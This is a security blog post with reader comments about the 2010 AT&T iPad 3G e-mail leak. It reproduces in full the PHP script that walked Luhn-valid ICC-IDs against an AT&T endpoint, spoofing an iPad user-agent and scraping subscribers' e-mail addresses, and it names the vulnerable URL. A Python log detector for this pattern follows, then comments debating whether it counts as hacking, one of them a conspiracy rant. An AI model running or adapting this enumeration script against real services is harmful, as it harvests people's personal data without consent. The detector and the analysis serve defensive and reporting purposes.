114,000 iPad Owners: The Script that Harvested Their E-mail Addresses
Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel, had their e-mail addresses revealed via a poorly designed web application hosted by AT&T.
Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.
After speaking with Goatse Security member Weev, he was kind enough to share the script:
<?php
// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)
$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1];
$ICCIDcount = $_SERVER['argv'][2];
function genluhn($number){ //Crappy home-made Luhn checkdigit generator
    $i = strlen($number)-1;
    do {
        $array[] = $number[$i];
        $i--;
    } while ($i > -1);
    $i = 0;
    foreach ($array as $digit) {
        if (!($i & 1)){
            $digit = $digit * 2;
            if ($digit >= 10) {
                $digit = $digit - 9;
            }
        }
        $total += $digit;
        $i++;
    }
    $luhn = 10 - ($total % 10);
    if ($luhn == 10) $luhn=0;
    return $luhn;
}
while (1) { //Continue FOREVER
    $ch = curl_init(); //Set up cURL
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
    $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to the ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
    $output = curl_exec($ch); //Load first page with ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
    $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. cURL is nice and passes the previously GET'd info
    curl_close($ch);
    //print $output; //Prints HTML result
    if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just to keep track of how far the script has gotten
    //Parse output. Terribly sloppy
    if (preg_match("/<title>Error<\/title>/", $output, $match)) {
        preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, $match);
        $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]);
        $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I want space between the period and the next sentence, dammit
        $errnum = strip_tags($match[0]);
        $status = "Error! ".$errnum; //Return specific error message
    } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", $output, $match)) {
        $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" placeholder=\"Required\" value=\"/","",$match[0]);
        $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", $match[0]); //Return email address
    } else {
        $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad logic, will fix.
    }
    if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
    if ($counter == $ICCIDcount) exit;
    $ICCIDroot++; //step ICCID
    $counter++; //step loop counter
}
?>
There are probably a few things worth pointing out. They had to set the user-agent string to that of the iPad, as shown:
$useragent="Mozilla/5.0 (iPad)";
The vulnerable URL at att.com was:
https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0
And that’s it: an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no hack, no infiltration, and no breach, just a really poorly designed web application that returns an e-mail address when an ICCID is passed to it.
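A detection-side counterpart to the script above, added here and not part of the original post or of any AT&T system: it parses constructed web-server log lines, groups ICCID lookups to the openPage endpoint by client address, and flags a client that walks consecutive, Luhn-valid ICCIDs, which is exactly the traffic pattern the script produces. The log format, the endpoint path as the only field of interest, and the run threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Constructed Apache-combined-format log lines; addresses and ICCIDs are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jun/2010:14:02:11 -0500] "GET /OEPClient/openPage?ICCID=89014104212345678909&IMEI=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (iPad)"
203.0.113.7 - - [09/Jun/2010:14:02:12 -0500] "GET /OEPClient/openPage?ICCID=89014104212345678917&IMEI=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (iPad)"
203.0.113.7 - - [09/Jun/2010:14:02:13 -0500] "GET /OEPClient/openPage?ICCID=89014104212345678925&IMEI=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (iPad)"
203.0.113.7 - - [09/Jun/2010:14:02:14 -0500] "GET /OEPClient/openPage?ICCID=89014104212345678933&IMEI=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (iPad)"
198.51.100.20 - - [09/Jun/2010:14:05:40 -0500] "GET /OEPClient/openPage?ICCID=89014104212345678917&IMEI=0 HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (iPad)"
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"')

def luhn_valid(digits):
    """True if the full number, check digit included, passes the Luhn check."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch) * 2 if i % 2 else int(ch)  # double every second digit from the right
        total += d - 9 if d > 9 else d
    return total % 10 == 0

def iccid_lookups(log_text):
    """Map client IP -> list of ICCIDs it submitted to the openPage endpoint."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        url = urlparse(m.group("target")) if m else None
        if url is None or url.path != "/OEPClient/openPage":
            continue
        per_ip[m.group("ip")].extend(i for i in parse_qs(url.query).get("ICCID", []) if i.isdigit())
    return per_ip

def longest_consecutive_run(iccids):
    """Longest run of ICCIDs whose bases (all digits but the check digit) step by one."""
    bases = sorted({int(i[:-1]) for i in iccids})
    best = run = 1 if bases else 0
    for a, b in zip(bases, bases[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best

def find_enumerators(log_text, min_run=3):
    """Flag clients walking consecutive ICCIDs: {ip: (lookups, longest_run, luhn_valid)}."""
    flagged = {}
    for ip, iccids in iccid_lookups(log_text).items():
        run = longest_consecutive_run(iccids)
        if run >= min_run:
            flagged[ip] = (len(iccids), run, sum(luhn_valid(i) for i in iccids))
    return flagged
```

A single customer looking up their own SIM produces one lookup and never trips the run check, while the sequential walk from 203.0.113.7 is flagged after a handful of requests.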
Filed Under: Enumeration


well, good for you!
It’s good for you, you get to see what the referenced PHP program looks like. We had already seen it.
Where did you see it, as I haven’t seen it myself.
sd
[...] upshot is that, as this page rightly points out (thanks to @securityninja for the link) “There’s no hack, no infiltration, and no [...]
[...] reports that by exploiting a vulnerability in the AT&T Web site, hacker group Goatse Security was able to collect email addresses associated with the SIM [...]
[...] Prefect has the actual PHP script itself, courtesy of Goatse member Weev, if you would like to take a look at it now that AT&T has fixed the [...]
“There’s no hack, no infiltration, and no breach, just a really poorly designed web application…”
Like “real” hacks are all different somehow.
None of us are really sure what you’re driving at there Captain NotObviousEnough.
[...] Web application that returns e-mail address when ICC-ID is passed to it,” says Praetorian Security Group in a blog post on the [...]
This is the very definition of a hack – “modification of a program or device to give the user access to features that were otherwise unavailable”. You fake your user-agent and then hammer a URL, it’s called hacking. What is surprising is that AT&T didn’t have any Denial of Service measures in place, surely the one IP hitting this URL a million times should have raised some alarms.
That’s kind of semantics right? Based on that definition, your browser is performing a “hack” right now to read this web site.
I guess my point is that it doesn’t rise to the level of a criminal intrusion, being more akin to an NMAP scan, which is what popular media thinks of with the word “hack”.
[...] as can be read on praetorianprefect.com, by means of a relatively simple PHP script a leak in an AJAX API [...]
Just by reading the description of the hack, one can easily visualize in his preferred programming language the way they did the job, just need the pattern of an ICC-ID, the script is pretty uninteresting at this point. It only shows that Gawker will pay anyone, even 4chan tards, to discredit Apple in any way (as shown by the title, which is false).
Seeing the script helped to make some sense out of what Gawker was reporting, and I had wanted to see the actual request to AT&T to see if there was anything more to it:
https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0
Apple must have known how this worked at some level, and therefore owns some culpability for not objecting to the design. But the initial Gawker reporting was over the top and misleading.
But you’re entitled to your opinion.
[...] wrote a PHP script that flooded AT&T’s Web site with possible ICC-ID numbers and logged responses when the [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [...]
[...] e-mail address when ICC-ID is passed to it,” Praetorian said in a late Wednesday entry on its security blog [Computer [...]
Looks like an inside job by an employee/coder at AT&T, purposefully writing a vulnerable script for a PR stunt involving Weev. A cheap shot aimed at Apple/Google, through another interface.
Just another Windows/Microsoft-type sleazy goings-on, who have a never-ending viral problem, fixed by buying new computers and viral software, because of a poor operating system, compared to Apple, who fixes any breach virtually before it occurs for free.
It may involve the Israeli-Chinese affair of trying to boot Google-Apple because of their reluctance to censor data for pseudo-religious/political-business/competition reasons. And a really sleazy, illogical justification shot at not allowing some of Apple’s new single-face computers to be sold in Israel.
This is the great nothing, a cheap shot at a bad PR Stunt, taken up in the news media, who does as they are told
“43f@adf*fx$” makes more sense. what are you smoking buddy?
[...] with law enforcement to investigate. To get the email addresses, the hackers took advantage of a home grown PHP script, which sent ICC ID numbers from SIMs to the AT&T server. The server was expecting to be called [...]
[...] The script that harvested 114,000 iPad users’ data [...]
If the data is in clear text, not protected and can simply be parsed I hardly call that a hack.
That almost sounds like what goes on in any company every day. That data should have been behind a firewall.
Sounds totally irresponsible on AT&T’s part.
ooh cute